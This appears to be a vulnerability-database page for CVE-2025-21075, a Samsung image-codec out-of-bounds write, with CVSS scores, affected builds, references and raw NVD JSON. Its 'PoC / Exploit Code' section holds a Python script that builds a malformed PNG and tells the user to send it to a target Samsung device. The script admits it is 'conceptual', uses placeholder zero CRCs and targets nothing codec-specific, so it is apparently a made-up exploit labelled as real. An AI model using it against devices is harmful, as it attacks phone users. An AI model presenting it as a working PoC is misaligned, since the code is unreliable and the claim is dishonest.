CVE-2025-21075

Description

Out-of-bounds write in libimagecodec.quram.so prior to SMR Nov-2025 Release 1 allows remote attackers to access out-of-bounds memory.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:samsung:android:13.0:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:samsung:android:13.0:smr-apr-2022-r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:samsung:android:13.0:smr-apr-2023-r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:samsung:android:13.0:smr-apr-2024-r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:samsung:android:13.0:smr-apr-2025-r1:*:*:*:*:*:* - VULNERABLE

Samsung SMR Nov-2025 Release 1之前的所有版本

libimagecodec.quram.so < Nov-2025版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import struct
import os

def create_malicious_image():
    """
    PoC for CVE-2025-21075: Out-of-bounds write in libimagecodec.quram.so
    This script generates a malicious image file that triggers the vulnerability.
    """
    
    # Craft a malicious image header with oversized dimensions
    # This is a conceptual PoC - actual exploitation requires specific firmware analysis
    
    header = b'\x89PNG\r\n\x1a\n'  # PNG signature
    
    # IHDR chunk with manipulated width/height values
    ihdr_data = struct.pack('>II', 0x7FFFFFFF, 0x7FFFFFFF)  # Oversized dimensions
    ihdr_data += struct.pack('>BBBB', 8, 6, 0, 0)  # bit depth, color type, compression, filter
    
    ihdr_crc = 0  # Placeholder CRC
    ihdr_chunk = struct.pack('>I', 13) + b'IHDR' + ihdr_data + struct.pack('>I', ihdr_crc)
    
    # IDAT chunk with oversized data to trigger buffer overflow
    oversized_data = b'\x00' * 0x100000  # 1MB of data to overflow buffer
    idat_crc = 0  # Placeholder CRC
    idat_chunk = struct.pack('>I', len(oversized_data)) + b'IDAT' + oversized_data + struct.pack('>I', idat_crc)
    
    # IEND chunk
    iend_chunk = struct.pack('>I', 0) + b'IEND' + struct.pack('>I', 0xAE426082)
    
    malicious_image = header + ihdr_chunk + idat_chunk + iend_chunk
    
    with open('CVE-2025-21075_poc.png', 'wb') as f:
        f.write(malicious_image)
    
    print('[+] Malicious image created: CVE-2025-21075_poc.png')
    print('[+] Send this file to target Samsung device')
    print('[+] Trigger: Open the image in Gallery/Camera app')

if __name__ == '__main__':
    create_malicious_image()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-21075
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-21075
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-21075/
[4] VulDB https://vuldb.com/cve/CVE-2025-21075
[5] https://security.samsungmobile.com/securityUpdate.smsb?year=2025&month=11

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-21075", "sourceIdentifier": "[email protected]", "published": "2025-11-05T06:15:33.720", "lastModified": "2025-11-07T13:02:47.623", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds write in libimagecodec.quram.so prior to SMR Nov-2025 Release 1 allows remote attackers to access out-of-bounds memory."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:-:*:*:*:*:*:*", "matchCriteriaId": "A123EDB1-3048-44B0-8D4D-39A2B24B5F6B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "BDE4D65E-8F9B-4810-AED6-95564A97D741"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "70825981-F895-4BFD-9B6E-92BFF0D67023"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "A5E68B7B-BA08-4E8C-B60A-B3836C6986BC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2025-r1:*:*:*:*:*:*", "matchCriteriaId": "AC42E785-02BF-4F27-B5CF-49572A2DBC8E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "0AF1EDA0-2712-4C3C-8D8A-89E154BB63DF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "88DC0A82-CAF3-4E88-8A4D-8AF79D0C226D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "6239D93F-CA0E-4120-96A1-FB63276EAEE8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2025-r1:*:*:*:*:*:*", "matchCriteriaId": "25F19D02-1FFC-48AF-9CB8-063C459E7A4B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2021-r1:*:*:*:*:*:*", "matchCriteriaId": "CD382E2D-0B51-4908-989A-88E083FC85BF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "299284DA-85AB-4162-B858-E67E5C6C14F7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "38B7AB56-AB65-4557-A91C-40CA2FD12351"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "858B0736-2272-4D5A-A77F-47023D21F7D0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "61D507C0-086B-4139-A560-126964DFA579"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "D98F307E-3B01-4C17-86E5-1C6299919417"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "952CA843-7CF0-4424-BDA4-3F2A93E077B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2025-r1:*:*:*:*:*:*", "matchCriteriaId": "39F64BAA-2E49-4919-A940-219391383D5E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "57B125ED-D939-4CBC-9E96-BBCF02402A69"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "7D7DA96D-9C25-4DDA-A6BF-D998AC346B89"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "07AC19C6-D245-4C3A-90CC-A931A901EA0A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2025-r1:*:*:*:*:*:*", "matchCriteriaId": "FDA1685E-D101-46F6-8857-7F0894E07748"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jul-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "DF85AA7B-E1C7-4946-92B4-E4D545CAACDF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:and ... (truncated)